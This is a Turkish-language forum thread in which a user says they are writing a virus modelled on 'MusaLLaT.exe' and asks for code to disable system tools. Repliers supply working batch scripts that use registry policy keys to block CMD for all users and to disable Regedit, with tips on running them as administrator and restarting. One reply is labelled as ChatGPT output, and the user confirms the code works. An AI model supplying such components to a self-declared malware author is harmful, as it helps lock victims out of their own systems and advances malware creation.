Merhaba. MusaLLaT.exe virüsü gibi bir virüs kodluyorum. Görev yöneticisi kapatma kodunu buldum. Şimdide bana cmd devre dışı bırakma kodu lazım. Biliyorsanız kodu yazabilirmisiniz? ? ?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
Bu komutla DisableCMD değerini 2 olarak ayarlayarak, yönetici dahil tüm kullanıcıların cmd'yi çalıştırmasını engellemiş olursunuz. //Chat GPT
taskkill komutu ile CMDyi devre dışı yapmayı deneyebilirsin.Merhaba. MusaLLaT.exe virüsü gibi bir virüs kodluyorum. Görev yöneticisi kapatma kodunu buldum. Şimdide bana cmd devre dışı bırakma kodu lazım. Biliyorsanız kodu yazabilirmisiniz? ? ?
teşekkürler deneyeceğimBash:@echo off reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
Sanal makinede kurmuş olduğun "Windows OS" denemen gerekiyor. Ben denemedim.
Konu ilgimi çekdi diye - araşdırma yapdım. Denedikden sonra olumlu ve ya olumsuz şekilde geri dönüş yaparsan sevinirim.
Yukarıdakı kodun çalışır olmasını doğrulayan kaynak: Windows 10'da Komut İstemi'ni (CMD) Devre Dışı Bırakma
.bat uzantılı dosya içeriğini yazdığım kodla değiştirdikden sonra "Yönetici olarak çalıştır"-a tıklamalısın, aksi halde regedit-de gösterilen path üzerinde DisableCMD oluşturulamaz.teşekkürler deneyeceğim
kodu denedim çalıştı teşekkürler birde regedit devre dışı bırakma biliyorsanız size zahmet onuda bi yazabilirmisiniz*?.bat uzantılı dosya içeriğini yazdığım kodla değiştirdikden sonra "Yönetici olarak çalıştır"-a tıklamalısın, aksi halde regedit-de gösterilen path üzerinde DisableCMD oluşturulamaz.
En sonda, değişikliklerin uygulanması için - Restart yapman gerek.
Teşekkürler & İyi çalışmalar.
kodu denedim çalıştı teşekkürler birde regedit devre dışı bırakma biliyorsanız size zahmet onuda bi yazabilirmisiniz*?
@echo off
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
echo Regedit başarıyla devre dışı bırakıldı.
pause
eywallah kral yardımların için teşekkür ederimBash:@echo off reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f echo Regedit başarıyla devre dışı bırakıldı. pause
Kısaltmalar:
HKLM - HKEY_LOCAL_MACHINE
//kısaltma path-de olduğu gibi kalsın, değiştirmene gerek yok. Böylede yürütüle biliyor.
Yukarıdakı kodun çalışır olmasını doğrulayan kaynak: Windows'ta Kayıt Defteri Düzenleyicisi (Regedit) Nasıl Devre Dışı Bırakılır
İyi çalışmalar dilerim. )eywallah kral yardımların için teşekkür ederim![]()
taskkill komutu Task Manager arayüzünde çalışan uyğulamaları "End Task" yapmak gibidir. Yani devre dışı bırakmaz. Sadece çalışan uygulamaları ve servisleri durdurmak için bir komutdur.taskkill komutu ile CMDyi devre dışı yapmayı deneyebilirsin.